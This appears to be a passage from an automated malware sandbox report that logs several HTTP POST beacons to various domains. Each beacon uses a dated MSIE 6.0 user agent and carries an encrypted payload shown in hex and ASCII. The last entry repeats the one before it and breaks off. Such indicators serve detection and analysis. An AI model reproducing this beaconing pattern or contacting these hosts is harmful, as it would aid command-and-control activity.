                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 75 4f 69 62 30 48 78 39 46 67 37 43 72 53 37 6c 4a 37 71 75 4b 67 2b 53 59 55 41 55 73 43 5a 79 63 4f 36 4e 6e 45 4f 6a 56 30 52 6a 35 6a 58 5a 52 7a 6e 2f 79 2b 51 77 4b 63 2f 4c 7a 76 45 54 78 58 72 36 66 67 33 2b 70 50 76 37 59 71 4f 72 71 6e 43 42 59 56 67 51 32 33 36 6c 4a 75 56 6a 71 4d 62 71 54 62 50 4d 58 62 63 36 56 71 6f 7a 57 33 32 4f 36 38 30 51 42 47 74 6e 71 2b 75 4c 31 6e 53 35 57 42 67 79 44 4d 4e 72 2b 53 4a 2b 4a 35 36 6e 4c 70 32 77 57 30 37 66 77 58 6b 77 59 41 39 41 51 7a 79 77 48 2f 57 47 63 63 4f 30 35 49 52 4a 39 63 79 7a 32 4d 75 78 4e 72 68 56 52 66 67 4f 50 54 46 54 30 35 58 4f 54 6a 4e 61 76 62 67 54 4b 34 43 5a 57 76 36 51 2b 30 34 36 64 47 55 4a 41 51 5a 78 4e 45 44 6b 61 4c 7a 2f 67 4c 6a 70 55 48 2f 47 4f 2b 72 51 71 4a 41 68 47 6c 43 36 44 54 49 74 78 59 46 68 45 4d 6f 6f 36 4f 48 78 4f 49 75 73 5a 67 48 39 66 67 51 57 70 4f 56 36 46 6b 75 37 31 53 32 4e 34 66 75 71 46 39 46 49 44 6a 31 68 55 59 4c 68 2f 64 7a 6a 37 42 53 53 71 32 2b 47 59 54 53 34 34 79 71 58 56 5a 70 6c 6a 58 52 2f 6d 32 76 44 6a 69 45 44 4d 35 2b 47 67 56 72 76 70 6a 54 6c 55 75 76 68 51 32 6d 51 57 4b 4f 4a 51 32 43 68 47 43 38 53 66 53 30 5a 39 37 4a 54 6d 71 54 66 55 74 6d 36 6a 4a 41 4c 6b 5a 6e 57 62 50 65 42 50 6b 47 77 38 52 4d 41 53 67 71 4d 77 49 4a 67 33 4a 59 2b 45 38 6d 52 2f 52 39 66 62 79 66 42 59 4a 6e 79 66 77 52 46 63 44 57 65 32 38 69 61 62 64 48 46 4c 54 58 6c 51 53 2f 4d 2f 70 6e 74 33 61 75 34 57 4a 61 32 78 34 63 4f 43 34 66 37 2f 2f 30 6d 6b 38 71 52 6f 52 74 4e 35 32 36 33 37 35 4e 57 4f 58 4f 41 4b 47 62 51 75 71 59 4d 4d 7a 47 63 64 61 35 65 52 36 4a 52 61 73 78 48 2b 5a 57 58 65 4f 48 5a 58 68 5a 41 45 62 2b 4a 54 39 45 30 66 6c 66 32 78 47 6e 34 61 41 34 39 63 64 62 4f 41 67 3d 3d Data Ascii: uOib0Hx9Fg7CrS7lJ7quKg+SYUAUsCZycO6NnEOjV0Rj5jXZRzn/y+QwKc/LzvETxXr6fg3+pPv7YqOrqnCBYVgQ236lJuVjqMbqTbPMXbc6VqozW32O680QBGtnq+uL1nS5WBgyDMNr+SJ+J56nLp2wW07fwXkwYA9AQzywH/WGccO05IRJ9cyz2MuxNrhVRfgOPTFT05XOTjNavbgTK4CZWv6Q+046dGUJAQZxNEDkaLz/gLjpUH/GO+rQqJAhGlC6DTItxYFhEMoo6OHxOIusZgH9fgQWpOV6Fku71S2N4fuqF9FIDj1hUYLh/dzj7BSSq2+GYTS44yqXVZpljXR/m2vDjiEDM5+GgVrvpjTlUuvhQ2mQWKOJQ2ChGC8SfS0Z97JTmqTfUtm6jJALkZnWbPeBPkGw8RMASgqMwIJg3JY+E8mR/R9fbyfBYJnyfwRFcDWe28iabdHFLTXlQS/M/pnt3au4WJa2x4cOC4f7//0mk8qRoRtN526375NWOXOAKGbQuqYMMzGcda5eR6JRasxH+ZWXeOHZXhZAEb+JT9E0flf2xGn4aA49cdbOAg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 47 58 70 39 30 48 39 38 46 67 36 6e 68 52 61 62 58 74 2b 55 45 51 6a 2f 72 55 33 56 43 76 63 32 49 39 51 54 50 33 48 2f 74 6b 34 31 67 30 2b 4a 38 78 33 62 7a 41 79 52 63 31 34 51 6c 45 6c 4e 4d 30 55 48 39 78 47 62 6f 43 6d 62 38 71 71 6a 46 79 59 33 30 71 42 62 73 71 66 4d 2f 53 31 4e 54 42 61 62 53 71 46 79 77 32 37 43 74 41 2f 6e 38 58 36 64 51 6d 68 2f 32 37 45 53 45 71 7a 33 30 64 79 4d 46 47 45 74 34 4d 32 35 75 75 69 66 71 2b 61 6f 42 2b 31 70 45 53 79 49 43 67 2b 46 6b 6e 4c 50 54 5a 43 75 72 35 52 68 51 32 6f 43 4e 6d 6b 43 4a 34 4b 69 33 39 4f 65 61 4c 4c 31 50 2f 61 65 42 53 38 59 55 72 74 55 37 74 2f 42 58 4f 4d 2f 6f 61 76 33 52 30 62 57 73 47 6b 76 55 6f 53 4e 4d 47 51 32 4d 64 4a 36 39 4b 49 41 66 66 58 64 33 71 49 77 76 6f 54 68 53 32 50 53 42 58 50 51 44 73 4e 78 4c 56 32 64 73 79 66 53 37 46 45 75 38 59 64 51 48 58 6b 79 6d 69 44 49 46 53 36 67 78 67 38 76 4b 44 55 78 6d 76 59 4f 50 61 47 79 52 75 6f 62 33 38 46 6b 52 58 6f 67 32 6d 38 4a 65 48 57 6b 46 35 68 30 7a 36 38 37 55 71 71 39 46 4a 77 7a 48 59 42 53 32 41 49 73 42 6e 4f 32 32 68 33 53 47 58 4c 73 75 77 34 66 46 33 70 6c 77 6d 41 4c 33 44 64 6c 4a 64 58 4e 55 35 71 46 39 36 61 57 56 4e 37 47 68 73 56 75 38 5a 4f 42 68 6e 51 2f 6c 45 70 47 50 70 65 56 30 5a 78 68 30 6d 50 63 65 4f 36 4b 52 6a 71 45 34 52 44 73 77 33 49 67 6a 61 48 66 32 62 75 57 37 33 2f 44 42 79 54 54 77 54 68 64 61 32 62 4f 38 67 46 65 51 4a 73 64 55 44 2f 50 72 35 61 57 4e 6f 70 6d 6e 7a 2b 4a 43 64 37 48 32 6f 78 53 42 64 34 32 51 55 78 54 4c 4f 71 73 6a 42 57 51 78 4c 79 37 77 59 34 4f 6f 42 59 5a 79 47 79 45 30 5a 78 59 56 32 75 56 51 50 6a 33 79 55 64 2b 36 49 35 78 50 5a 6e 71 7a 73 65 70 48 39 59 3d Data Ascii: GXp90H98Fg6nhRabXt+UEQj/rU3VCvc2I9QTP3H/tk41g0+J8x3bzAyRc14QlElNM0UH9xGboCmb8qqjFyY30qBbsqfM/S1NTBabSqFyw27CtA/n8X6dQmh/27ESEqz30dyMFGEt4M25uuifq+aoB+1pESyICg+FknLPTZCur5RhQ2oCNmkCJ4Ki39OeaLL1P/aeBS8YUrtU7t/BXOM/oav3R0bWsGkvUoSNMGQ2MdJ69KIAffXd3qIwvoThS2PSBXPQDsNxLV2dsyfS7FEu8YdQHXkymiDIFS6gxg8vKDUxmvYOPaGyRuob38FkRXog2m8JeHWkF5h0z687Uqq9FJwzHYBS2AIsBnO22h3SGXLsuw4fF3plwmAL3DdlJdXNU5qF96aWVN7GhsVu8ZOBhnQ/lEpGPpeV0Zxh0mPceO6KRjqE4RDsw3IgjaHf2buW73/DByTTwThda2bO8gFeQJsdUD/Pr5aWNopmnz+JCd7H2oxSBd42QUxTLOqsjBWQxLy7wY4OoBYZyGyE0ZxYV2uVQPj3yUd+6I5xPZnqzsepH9Y=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 79 64 6b 52 6b 6c 37 6b 36 67 32 50 4d 47 63 46 71 51 43 49 31 55 47 78 41 6b 69 65 35 54 31 35 63 74 71 44 76 79 37 66 75 43 52 6e 56 68 32 34 6b 6d 67 69 73 38 6a 51 38 6f 69 53 64 67 2b 38 71 48 57 53 2f 4d 48 6f 30 50 4a 32 4c 37 74 48 2f 74 55 37 70 58 6f 54 38 41 68 56 65 71 71 69 32 4b 64 51 36 50 6c 73 52 58 66 52 48 2f 63 54 73 6e 36 44 5a 2b 47 63 35 47 53 46 67 65 4b 33 64 4b 62 79 51 75 2f 4e 5a 61 4e 4a 46 2b 43 46 30 6a 6a 42 2b 4a 39 74 56 61 67 4c 5a 53 74 6e 74 52 2b 57 41 43 6c 50 4f 6c 65 5a 2f 45 48 35 78 33 43 6b 38 4a 69 36 42 6d 43 37 2b 72 72 57 6e 42 6f 37 38 49 72 32 35 4a 51 51 63 37 49 2b 75 74 6a 69 31 34 71 65 6a 63 58 5a 6a 75 66 42 66 6e 38 45 4b 67 30 50 7a 39 6c 62 64 54 48 48 31 6d 72 4e 66 44 4c 74 65 6a 53 5a 66 56 5a 49 45 68 42 64 67 74 33 61 5a 63 49 6f 50 66 69 37 4c 4b 75 78 31 46 6b 71 57 4a 59 57 4d 32 68 52 68 53 75 6f 31 78 2f 2b 58 78 51 55 61 35 61 5a 69 63 56 4a 33 75 31 4d 53 59 6e 57 55 6f 54 57 56 57 7a 31 33 46 6c 74 34 6c 56 6f 4d 35 53 6c 42 79 65 31 5a 45 59 37 4d 61 48 57 51 4e 52 67 63 76 74 55 63 7a 4c 48 53 34 58 52 5a 72 46 4e 33 32 59 59 37 4e 36 4d 4f 48 58 58 34 64 36 4c 75 53 72 5a 55 69 53 64 6d 61 4d 72 59 57 46 57 4f 5a 69 36 66 39 5a 6a 64 43 71 4c 31 71 41 6d 65 4c 35 4a 58 4d 70 50 2b 4e 49 4c 34 37 4b 4a 43 71 73 6e 78 38 38 64 55 72 77 6f 53 55 5a 6c 70 75 6a 31 43 39 65 64 70 61 4d 6e 79 59 57 6e 58 69 4d 48 39 32 58 41 69 47 63 55 6a 2f 71 33 58 50 65 77 54 56 38 6d 42 65 76 78 45 2f 4e 70 59 71 57 4b 69 6f 68 37 42 57 36 6f 32 43 34 4c 45 4f 51 7a 51 39 33 4c 36 37 2b 2f 34 48 43 37 72 48 49 75 37 30 56 53 72 37 35 31 66 7a 6d 69 4b 58 6a 67 4c 61 51 59 58 77 3d 3d Data Ascii: ydkRkl7k6g2PMGcFqQCI1UGxAkie5T15ctqDvy7fuCRnVh24kmgis8jQ8oiSdg+8qHWS/MHo0PJ2L7tH/tU7pXoT8AhVeqqi2KdQ6PlsRXfRH/cTsn6DZ+Gc5GSFgeK3dKbyQu/NZaNJF+CF0jjB+J9tVagLZStntR+WAClPOleZ/EH5x3Ck8Ji6BmC7+rrWnBo78Ir25JQQc7I+utji14qejcXZjufBfn8EKg0Pz9lbdTHH1mrNfDLtejSZfVZIEhBdgt3aZcIoPfi7LKux1FkqWJYWM2hRhSuo1x/+XxQUa5aZicVJ3u1MSYnWUoTWVWz13Flt4lVoM5SlBye1ZEY7MaHWQNRgcvtUczLHS4XRZrFN32YY7N6MOHXX4d6LuSrZUiSdmaMrYWFWOZi6f9ZjdCqL1qAmeL5JXMpP+NIL47KJCqsnx88dUrwoSUZlpuj1C9edpaMnyYWnXiMH92XAiGcUj/q3XPewTV8mBevxE/NpYqWKioh7BW6o2C4LEOQzQ93L67+/4HC7rHIu70VSr751fzmiKXjgLaQYXw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 37 56 43 66 4c 62 75 43 47 51 34 61 76 69 62 66 55 68 67 55 34 71 53 6f 43 69 66 42 4d 78 51 69 48 37 6a 47 43 59 55 32 43 6e 51 35 54 73 44 75 71 32 2f 31 43 54 6a 6e 35 51 4d 47 74 6b 48 43 56 6a 53 69 57 72 76 36 58 6f 56 48 55 41 45 4f 56 77 35 49 6f 72 39 4d 79 51 4e 4e 35 53 75 74 5a 6c 42 74 5a 2b 52 30 78 33 35 53 54 48 72 2b 52 79 52 50 49 6c 6b 31 5a 61 76 4e 4f 61 6c 74 53 39 2f 34 75 42 4b 62 6c 53 42 5a 69 42 76 30 47 73 2f 54 69 6c 65 62 76 58 4d 61 46 55 4c 4b 6b 51 58 35 72 69 76 64 2f 47 6c 39 6b 42 59 66 48 37 6c 2b 64 38 47 31 74 6c 32 49 35 77 31 41 68 36 54 32 57 69 42 4f 57 56 65 66 67 32 59 32 48 6b 72 32 66 49 55 59 45 78 4e 58 4b 6b 66 64 2f 37 76 4b 4c 2b 35 78 66 48 77 46 34 56 73 56 75 75 53 65 4a 32 50 4f 31 57 61 4c 55 2f 65 72 34 55 46 44 6f 44 4f 72 48 52 47 66 6b 58 69 4d 4e 6d 74 33 75 30 48 74 51 39 35 39 79 71 4a 43 5a 37 35 2b 51 70 50 6c 79 36 63 69 4f 51 6b 6c 45 30 67 42 69 57 51 6e 79 67 6b 2b 44 74 2b 6f 50 4c 37 4d 2f 62 30 31 46 4a 65 43 6e 49 6f 49 4d 69 4d 6e 30 52 64 74 57 32 48 74 75 78 59 35 65 33 56 6a 45 53 67 58 4d 71 57 74 55 61 34 31 58 74 6f 62 4a 39 46 59 77 38 4e 53 2b 46 6d 79 6f 48 5a 44 4b 36 55 6c 69 34 6e 39 79 45 69 39 56 36 57 67 37 6e 68 4e 77 55 6c 78 63 51 78 4a 31 63 65 74 61 6e 63 34 48 74 73 4d 71 67 58 63 6e 5a 46 4e 66 41 6a 48 6f 48 70 59 64 59 41 30 50 73 2b 71 6f 59 71 45 56 44 56 59 63 31 50 4a 72 70 70 71 47 48 70 6a 58 46 72 79 2b 2b 32 33 4c 59 33 30 4a 72 4a 79 66 6e 4a 62 5a 68 56 61 6f 6c 38 58 6e 4d 5a 39 64 69 4b 58 4a 69 50 45 41 36 52 44 49 66 54 6c 7a 71 75 4b 47 58 36 54 62 66 4e 79 51 73 5a 4f 43 63 39 43 79 6e 55 3d Data Ascii: 7VCfLbuCGQ4avibfUhgU4qSoCifBMxQiH7jGCYU2CnQ5TsDuq2/1CTjn5QMGtkHCVjSiWrv6XoVHUAEOVw5Ior9MyQNN5SutZlBtZ+R0x35STHr+RyRPIlk1ZavNOaltS9/4uBKblSBZiBv0Gs/TilebvXMaFULKkQX5rivd/Gl9kBYfH7l+d8G1tl2I5w1Ah6T2WiBOWVefg2Y2Hkr2fIUYExNXKkfd/7vKL+5xfHwF4VsVuuSeJ2PO1WaLU/er4UFDoDOrHRGfkXiMNmt3u0HtQ959yqJCZ75+QpPly6ciOQklE0gBiWQnygk+Dt+oPL7M/b01FJeCnIoIMiMn0RdtW2HtuxY5e3VjESgXMqWtUa41XtobJ9FYw8NS+FmyoHZDK6Uli4n9yEi9V6Wg7nhNwUlxcQxJ1cetanc4HtsMqgXcnZFNfAjHoHpYdYA0Ps+qoYqEVDVYc1PJrppqGHpjXFry++23LY30JrJyfnJbZhVaol8XnMZ9diKXJiPEA6RDIfTlzquKGX6TbfNyQsZOCc9CynU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 44 7a 77 55 78 58 7a 4e 44 51 36 48 52 4f 52 78 4a 38 6f 64 68 41 39 69 5a 5a 73 55 41 44 6a 6d 63 44 37 52 6b 4d 45 6c 6c 6e 6f 63 58 76 79 76 71 50 66 49 63 47 6e 65 47 62 38 6f 43 4a 4c 6b 75 43 64 45 61 72 4c 4d 31 69 4d 58 65 4f 72 32 47 45 33 54 4b 44 69 4b 4a 79 70 6e 62 73 5a 4e 6a 6a 56 47 59 53 54 6c 6f 46 5a 63 7a 48 70 68 69 75 6a 79 59 34 42 2b 5a 62 66 36 54 53 68 4d 7a 37 5a 7a 67 4d 4b 2b 43 71 41 69 6a 4a 32 34 4e 37 57 2f 54 41 57 55 6c 33 51 61 75 44 5a 76 61 48 47 68 58 33 5a 37 67 67 2f 6c 72 33 30 35 30 35 56 68 78 6a 4f 47 63 69 70 6a 41 76 71 72 39 41 53 44 32 77 51 36 79 63 6e 49 68 52 57 34 65 73 69 72 56 4e 45 30 45 48 69 68 55 69 6a 59 30 74 4f 79 78 4a 62 75 2f 62 38 45 47 64 58 5a 4a 6c 52 55 67 4b 62 7a 37 4e 50 4e 42 69 31 53 75 67 6d 73 7a 4e 45 78 64 36 49 76 37 2f 38 30 34 66 45 75 6b 70 78 6e 6b 78 6b 53 6c 71 35 51 6e 48 5a 77 58 42 39 74 5a 4c 6c 4f 67 54 74 2f 4d 34 52 39 70 6a 68 79 65 59 62 66 59 67 4c 34 39 48 55 4b 64 37 35 57 55 30 31 36 4e 42 73 72 74 37 44 41 6a 6f 43 4a 78 31 50 75 6e 5a 31 69 65 34 4e 6c 59 69 73 48 30 54 61 36 33 41 49 48 71 56 4a 6c 31 61 6b 42 30 62 43 2b 6e 6d 67 7a 48 6d 52 6a 45 38 64 69 34 79 57 4b 37 59 5a 57 4e 4c 76 4f 74 2f 47 4e 42 31 43 4c 4d 55 4a 6a 37 48 53 56 41 35 43 45 4f 41 64 31 48 44 4a 2b 45 54 67 4e 35 74 51 38 52 44 77 5a 76 70 78 74 78 37 51 4b 6f 45 51 2b 57 2f 42 64 56 43 37 51 64 55 38 48 39 58 4d 35 4c 6e 39 4b 67 45 49 48 37 32 66 61 45 31 79 57 39 31 78 67 6c 30 4e 49 56 66 45 74 51 41 4c 39 34 31 2f 79 66 30 4e 76 4f 70 35 59 37 74 48 6f 39 6b 70 56 4a 72 47 73 50 77 43 69 37 65 37 4d 58 2b 74 42 4b 5a 43 57 72 77 44 66 52 4d 76 4d 2b 32 41 57 79 77 55 3d Data Ascii: DzwUxXzNDQ6HRORxJ8odhA9iZZsUADjmcD7RkMEllnocXvyvqPfIcGneGb8oCJLkuCdEarLM1iMXeOr2GE3TKDiKJypnbsZNjjVGYSTloFZczHphiujyY4B+Zbf6TShMz7ZzgMK+CqAijJ24N7W/TAWUl3QauDZvaHGhX3Z7gg/lr30505VhxjOGcipjAvqr9ASD2wQ6ycnIhRW4esirVNE0EHihUijY0tOyxJbu/b8EGdXZJlRUgKbz7NPNBi1SugmszNExd6Iv7/804fEukpxnkxkSlq5QnHZwXB9tZLlOgTt/M4R9pjhyeYbfYgL49HUKd75WU016NBsrt7DAjoCJx1PunZ1ie4NlYisH0Ta63AIHqVJl1akB0bC+nmgzHmRjE8di4yWK7YZWNLvOt/GNB1CLMUJj7HSVA5CEOAd1HDJ+ETgN5tQ8RDwZvpxtx7QKoEQ+W/BdVC7QdU8H9XM5Ln9KgEIH72faE1yW91xgl0NIVfEtQAL941/yf0NvOp5Y7tHo9kpVJrGsPwCi7e7MX+tBKZCWrwDfRMvM+2AWywU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 76 46 66 77 79 59 32 6c 42 51 37 45 34 38 4f 69 42 49 6c 7a 58 55 59 64 59 58 4c 37 75 38 4c 4c 45 66 63 7a 36 63 59 66 6b 51 46 6a 53 30 7a 4e 7a 34 72 59 67 75 50 35 67 78 46 63 30 6e 49 55 42 46 38 48 73 2f 48 4c 76 46 56 4b 4f 4c 4a 56 5a 68 4b 43 63 48 41 5a 30 6b 59 37 6a 52 66 6e 58 50 62 6e 37 6d 6a 43 55 2f 45 34 61 6e 51 6d 58 6d 73 2f 4c 58 37 74 63 37 64 6e 49 6b 30 4e 4a 30 75 6d 32 77 50 5a 69 6f 4f 57 36 78 4c 48 74 76 64 64 65 53 6b 41 36 42 59 34 62 4a 79 2f 64 61 55 71 4d 68 46 74 32 6a 63 6a 77 58 56 41 41 32 2b 53 33 36 77 2b 58 33 57 77 6e 5a 4b 53 58 7a 63 35 41 37 58 51 79 55 37 72 6d 4a 58 50 67 6f 57 45 72 67 6f 33 57 30 65 52 6e 55 31 35 5a 76 78 4c 63 49 51 42 6c 37 41 6b 75 31 4f 41 52 70 66 4d 65 36 2f 64 39 58 5a 41 71 53 44 46 59 50 55 43 56 49 69 4f 63 38 45 6b 6e 4d 56 6e 32 33 45 61 49 66 56 66 30 75 61 46 61 69 41 44 59 71 77 2b 58 33 6e 6a 2f 4b 31 77 4e 75 6c 48 68 67 6a 53 44 58 55 46 37 74 48 70 79 45 7a 65 35 46 74 41 68 73 67 76 75 6a 41 6b 52 5a 4d 7a 69 77 67 62 70 4a 39 75 6a 58 2f 59 34 51 37 74 36 57 2f 49 57 70 2f 2b 6b 53 56 66 37 6a 71 64 64 4a 4c 2f 73 4d 73 74 66 44 47 74 53 65 2b 53 46 4e 4f 6f 58 61 43 30 61 38 62 61 79 4d 53 35 65 4f 72 4e 64 38 62 6a 6d 31 41 76 67 58 38 49 70 78 33 55 78 73 56 41 6f 4b 71 6a 4d 62 45 79 71 32 46 4a 52 4f 4d 32 6a 4f 6e 4c 34 54 48 75 70 67 74 76 54 72 66 4a 6a 4b 4f 4f 4c 69 68 2b 64 4d 46 4a 44 55 6b 6f 64 6f 79 73 71 59 76 69 52 58 4c 4d 6b 7a 48 35 75 71 4b 61 4e 6f 6e 4b 31 54 32 31 76 66 72 50 71 79 76 43 53 6e 4a 36 2b 58 63 49 78 67 71 4f 49 64 6e 4f 65 2f 4e 6d 69 4b 50 47 51 58 77 30 51 58 46 67 73 54 66 78 79 66 72 74 47 33 72 34 37 77 4f 6c 64 33 72 65 65 6f 4d 51 53 77 3d 3d Data Ascii: vFfwyY2lBQ7E48OiBIlzXUYdYXL7u8LLEfcz6cYfkQFjS0zNz4rYguP5gxFc0nIUBF8Hs/HLvFVKOLJVZhKCcHAZ0kY7jRfnXPbn7mjCU/E4anQmXms/LX7tc7dnIk0NJ0um2wPZioOW6xLHtvddeSkA6BY4bJy/daUqMhFt2jcjwXVAA2+S36w+X3WwnZKSXzc5A7XQyU7rmJXPgoWErgo3W0eRnU15ZvxLcIQBl7Aku1OARpfMe6/d9XZAqSDFYPUCVIiOc8EknMVn23EaIfVf0uaFaiADYqw+X3nj/K1wNulHhgjSDXUF7tHpyEze5FtAhsgvujAkRZMziwgbpJ9ujX/Y4Q7t6W/IWp/+kSVf7jqddJL/sMstfDGtSe+SFNOoXaC0a8bayMS5eOrNd8bjm1AvgX8Ipx3UxsVAoKqjMbEyq2FJROM2jOnL4THupgtvTrfJjKOOLih+dMFJDUkodoysqYviRXLMkzH5uqKaNonK1T21vfrPqyvCSnJ6+XcIxgqOIdnOe/NmiKPGQXw0QXFgsTfxyfrtG3r47wOld3reeoMQSw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 4e 76 59 43 6e 48 51 59 48 51 36 43 50 63 65 63 7a 32 6e 37 37 73 66 2f 72 74 4a 73 30 73 52 77 36 48 78 59 6a 53 76 4d 79 61 70 5a 6a 4b 38 6b 56 65 42 61 67 71 6e 4e 39 38 4c 6d 30 73 42 63 32 6a 68 2f 56 33 6c 57 6b 54 6f 4b 38 36 38 5a 39 57 39 59 61 4d 68 69 4a 35 7a 51 66 56 4a 4f 61 32 78 2b 5a 44 39 4b 4e 4c 4f 76 47 68 6d 63 36 35 69 47 6b 62 78 6a 65 36 57 75 73 66 76 67 4d 72 52 48 36 56 51 48 53 72 58 35 64 66 53 51 79 2f 5a 6e 59 63 49 70 6e 47 39 4a 56 73 48 6e 61 6d 66 57 4e 61 42 61 34 41 4a 4b 4f 6b 6f 59 30 55 61 42 56 73 53 44 2b 50 54 4f 30 72 56 52 46 38 64 4b 33 37 62 67 53 52 52 65 56 56 6b 2f 35 52 39 67 75 33 39 36 59 4d 48 4a 37 61 51 75 6a 7a 64 76 4f 58 43 6b 4a 48 37 6e 42 71 31 6a 66 4c 53 47 2b 2b 6c 2b 33 7a 37 2f 54 59 37 30 35 42 68 62 55 78 6b 32 42 63 6a 43 4f 54 30 65 4c 75 74 2b 45 69 31 37 4c 44 64 70 31 4f 62 79 77 50 50 39 73 6a 38 34 55 61 52 2b 47 75 65 73 44 36 34 5a 44 4f 71 7a 36 6d 72 50 47 59 66 50 38 34 76 6a 67 41 44 5a 53 75 6e 4c 4e 5a 56 52 71 66 61 6d 4a 5a 62 45 63 62 34 6c 38 37 4a 35 4b 2f 37 69 38 2b 32 54 33 4e 6d 68 2f 31 51 59 48 51 39 73 57 70 31 4f 49 2b 48 34 31 64 51 6c 4d 2b 30 46 64 37 4c 68 48 56 76 47 44 58 42 42 42 6b 45 41 63 47 37 5a 44 73 66 37 53 67 50 52 6a 58 73 68 2b 53 6e 69 74 48 75 75 35 34 38 49 30 63 52 57 61 53 70 71 64 65 51 5a 65 73 4f 6f 47 64 48 55 65 4b 79 41 66 6a 66 6b 33 42 34 50 6a 6d 50 35 69 4c 5a 32 53 32 34 4a 39 54 54 68 35 4d 45 33 49 63 4f 39 4c 38 49 69 53 4f 55 49 32 77 5a 4d 38 55 70 4c 4a 7a 55 45 71 6f 63 62 76 31 34 72 6e 55 73 75 61 61 53 38 77 68 57 43 4b 45 75 36 43 6b 73 49 36 73 78 4f 73 61 4d 3d Data Ascii: NvYCnHQYHQ6CPcecz2n77sf/rtJs0sRw6HxYjSvMyapZjK8kVeBagqnN98Lm0sBc2jh/V3lWkToK868Z9W9YaMhiJ5zQfVJOa2x+ZD9KNLOvGhmc65iGkbxje6WusfvgMrRH6VQHSrX5dfSQy/ZnYcIpnG9JVsHnamfWNaBa4AJKOkoY0UaBVsSD+PTO0rVRF8dK37bgSRReVVk/5R9gu396YMHJ7aQujzdvOXCkJH7nBq1jfLSG++l+3z7/TY705BhbUxk2BcjCOT0eLut+Ei17LDdp1ObywPP9sj84UaR+GuesD64ZDOqz6mrPGYfP84vjgADZSunLNZVRqfamJZbEcb4l87J5K/7i8+2T3Nmh/1QYHQ9sWp1OI+H41dQlM+0Fd7LhHVvGDXBBBkEAcG7ZDsf7SgPRjXsh+SnitHuu548I0cRWaSpqdeQZesOoGdHUeKyAfjfk3B4PjmP5iLZ2S24J9TTh5ME3IcO9L8IiSOUI2wZM8UpLJzUEqocbv14rnUsuaaS8whWCKEu6CksI6sxOsaM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 4e 76 59 43 6e 48 51 59 48 51 36 43 50 63 65 63 7a 32 6e 37 37 73 66 2f 72 74 4a 73 30 73 52 77 36 48 78 59 6a 53 76 4d 79 61 70 5a 6a 4b 38 6b 56 65 42 61 67 71 6e 4e 39 38 4c 6d 30 73 42 63 32 6a 68 2f 56 33 6c 57 6b 54 6f 4b 38 36 38 5a 39 57 39 59 61 4d 68 69 4a 35 7a 51 66 56 4a 4f 61 32 78 2b 5a 44 39 4b 4e 4c 4f 76 47 68 6d 63 36 35 69 47 6b 62 78 6a 65 36 57 75 73 66 76 67 4d 72 52 48 36 56 51 48 53 72 58 35 64 66 53 51 79 2f 5a 6e 59 63 49 70 6e 47 39 4a 56 73 48 6e 61 6d 66 57 4e 61 42 61 34 41 4a 4b 4f 6b 6f 59 30 55 61 42 56 73 53 44 2b 50 54 4f 30 72 56 52 46 38 64 4b 33 37 62 67 53 52 52 65 56 56 6b 2f 35 52 39 67 75 33 39 36 59 4d 48 4a 37 61 51 75 6a 7a 64 76 4f 58 43 6b 4a 48 37 6e 42 71 31 6a 66 4c 53 47 2b 2b 6c 2b 33 7a 37 2f 54 59 37 30 35 42 68 62 55 78 6b 32 42 63 6a 43 4f 54 30 65 4c 75 74 2b 45 69 31 37 4c 44 64 70 31 4f 62 79 77 50 50 39 73 6a 38 34 55 61 52 2b 47 75 65 73 44 36 34 5a 44 4f 71 7a 36 6d 72 50 47 59 66 50 38 34 76 6a 67 41 44 5a 53 75 6e 4c 4e 5a 56 52 71 66 61 6d 4a 5a 62 45 63 62 34 6c 38 37 4a 35 4b 2f 37 69 38 2b 32 54 33 4e 6d 68 2f 31 51 59 48 51 39 73 57 70 31 4f 49 2b 48 34 31 64 51 6c 4d 2b 30 46 64 37 4c 68 48 56 76 47 44 58 42 42 42 6b 45 41 63 47 37 5a 44 73 66 37 53 67 50 52 6a 58 73 68 2b 53 6e 69 74 48 75 75 35 34 38 49 30 63 52 57 61 53 70 71 64 65 51 5a 65 73 4f 6f 47 64 48 55 65 4b 79 41 66 6a 66 6b 33 42 34 50 6a 6d 50 35 69 4c 5a 32 53 32 34 4a 39 54 54 68 35 4d 45 33 49 63 4f 39 4c 38 49 69 53 4f 55 49 32 77 5a 4d 38 55 70 4c 4a 7a 55 45 71 6f 63 62 76 31 34 72 6e 55 73 75 61 61 53 38 77 68 57 43 4b 45 75 36 43 6b 73 49 36 73 78 4f 73 61 4d 3d Data Ascii: 